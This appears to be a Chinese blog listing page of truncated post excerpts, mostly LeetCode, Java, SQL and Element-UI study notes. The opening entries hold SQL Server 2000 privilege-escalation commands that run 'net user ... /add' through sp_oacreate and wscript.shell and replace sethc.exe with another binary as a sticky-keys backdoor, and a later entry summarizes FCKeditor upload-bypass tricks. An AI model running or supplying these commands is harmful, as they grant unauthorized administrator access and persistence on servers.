sql 2000 提权经测试
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell,'run',null,'c:\windows\system32\cmd.exe /c net user test test'declare @shell int exec sp_oacreate 'wscript.s
sql 2000 数据库SA提权方法
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user wbj wbj /add'declare @o intexec sp_oacreate 'wscript.
SQL 2000 SA替换Shift程序
declare @o intexec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';
查看IP绑有多少域名
http://www.yougetsignal.com/tools/web-sites-on-web-server/http://www.domaintools.com/reverse-ip/
反编译 .NETZ 压缩过的exe程序
在网上下载了一个程序,觉得程序功能不错,看程序界面像是用.NET写的(用PEiD查看了,检测结果是Microsoft Visual C# / Basic .NET),于是想用 .NET Reflector反编译看一下代码,如下图:结果发现这个程序使用.NETZ 压缩过了,整个程序用 .NET Reflector反编译后就只得到了NetzStarter.cs文件和一个资源文件app.re
Fckeditor漏洞利用总结
Fckeditor漏洞利用总结 查看编辑器版本FCKeditor/_whatsnew.html—————————————————————————————————————————————————————————————2. Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破!测试通过。—————————————————————————
全国综合性地方门户网站系统
全国综合性地方门户网站系统,火鸟门户系统最新版界面欣赏功能如下:信息资讯、二手信息、房产门户、招聘求职、贴吧社区、在线商城、美食外卖、团购秒杀、视频直播、同城活动、养老机构、教育培训、旅游频道、婚嫁频道、家政服务、汽车、装修、拖拽专题、互动交友、电子报刊、自助建站、便民黄页、投票活动、积分商城、VR全景、视频频道、图说资讯、圈子动态(抖音圈子)、微信小程序、百度小程序、QQ小程序等火鸟门户系统旗舰开发版五端数据同步PC电脑端+WAP移动端+H5微信端+微信小程序+APP客户端+代码开源...
2020-11-05 leetcode1470
LeetCode第1470题:重新排列数组题目描述:给你一个数组 nums ,数组中有 2n 个元素,按 [x1,x2,…,xn,y1,y2,…,yn] 的格式排列。请你将数组按 [x1,y1,x2,y2,…,xn,yn] 格式重新排列,返回重排后的数组。示例 1:输入:nums = [2,5,1,3,4,7], n = 3输出:[2,3,5,4,1,7]解释:由于 x1=2, x2=5, x3=1, y1=3, y2=4, y3=7 ,所以答案为 [2,3,5,4,1,7]示例 2:输入
LeetCode第7题(又是啥也不会的萌新被迫营业的一天doge)
leetcode第7题题目描述:给出一个 32 位的有符号整数,你需要将这个整数中每位上的数字进行反转。示例 1:输入: 123输出: 321示例 2:输入: -123输出: -321示例 3:输入: 120输出: 21注意:假设我们的环境只能存储得下 32 位的有符号整数,则其数值范围为 [−231, 231 − 1]。请根据这个假设,如果反转后整数溢出那么就返回 0。来源:力扣(LeetCode)链接:https://leetcode-cn.com/problems/re
2020-11-17 leetcode1030
LeetCode1030题:距离顺序排列矩阵单元格题目描述:给出 R 行 C 列的矩阵,其中的单元格的整数坐标为 (r, c),满足 0 <= r < R 且 0 <= c < C。另外,我们在该矩阵中给出了一个坐标为 (r0, c0) 的单元格。返回矩阵中的所有单元格的坐标,并按到 (r0, c0) 的距离从最小到最大的顺序排,其中,两单元格(r1, c1) 和 (r2, c2) 之间的距离是曼哈顿距离,|r1 - r2| + |c1 - c2|。(你可以按任何满足此条件的
关于Java异常处理的一些知识
异常处理这几天又看了一下异常处理,记录一下书和视频里面的一些知识点,有什么不对或者漏掉的地方欢迎指出。关于异常的常用的5个关键字:1、try:里面放置可能引发异常的代码2、catch:接异常类型和代码(个人感觉和if语句有点像)3、finally:回收在try里打开的资源(就是确保finally里的代码一定会执行)4、throw:抛出一个异常(个人感觉是让人更容易看懂)5、throws:声明可能抛出的异常(让别人解决)try后面的catch是一定要有的,finally可以没有try…cat
数据库(跟着b站学习的笔记)
数据库基本基本的查询语句基本查询:SELECT 列名 FROM 表名关键字:SELECT 指定要查询的列FROM 指定要查询的行查询所有列1、使用*的方式2、全列名查询注意:生产环境下优先使用全列表名查询。*需要转换成全列名,效率低,可读性差运算符对列中的数据进行运算运算符 作用+ 加法- 减法* 乘法/ 或 DIV 除法% 或 MOD 取余注意:%是占位符,而非模运算符。select查出来的是一个虚拟表SELECT EMPLOYEE_ID,FI
注解和反射(跟着b站学习的笔记)
文章目录注解1.1、什么是注解1.2、内置注解1.3、元注解1.4、自定义注解反射2.1、反射机制概述2.2、获得反射对象2.3、得到Class类的几种方式2.4、所有类型的Class对象2.5、类加载内存分析2.6、分析类初始化2.7、类加载器2.8、获取类的运行时结构2.9、动态创建对象执行方法2.10、性能对比分析2.11、获取泛型信息2.12、获取注解信息注解1.1、什么是注解·Annotation是从JDK5.0开始引入的新技术·Annotation的作用: -不是程序本身,可以对程序
网络编程(跟着b站学习的笔记)
文章目录网络编程1.1、概述1.2、网络通信的要素1.3、IP1.4、端口1.5、通信协1.6、TCP文件上传Tomcat1.7、UDP发送消息循环发送消息1.8、URL网络编程1.1、概述地球村:你在西安,你一个美国朋友!信件:[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-caNNjcVt-1611597433025)(C:\Users\www19\Documents\ShareX\Screenshots\2021-01\mspaint_MPZpu3fiDJ.pn
Element-UI Pagination 分页
<div class="block"> <span class="demonstration">页数较少时的效果</span> <el-pagination #小型分页 small #设置背景 background #当前页数 :current-page="currentPage1" # 超过多少页会显示成 ... :pager-count="11" #表示四个选项,每页显示
Element-UI Button按钮
type:primary/danger/info/warningsuccessplain round circleicon=“el-icon-search”disabledtype = “text”上传 class=“el-icon-upload el-icon–right”>loadingel-button-groupicon=“el-icon-arrow-left”class=“el-icon-arrow-right el-icon–right”size=medium sm.
Element-UI el-row el-col 布局
el-row :gutter=“30”>el-col:span=“24”v-for="(item,index) in list":key=“index”**@click.native="handleClick() el-card :body-style="{ padding: '5px' }" > hello /el-card>/el-col>字体加粗:b> </bstrong> &
今日推荐
周排行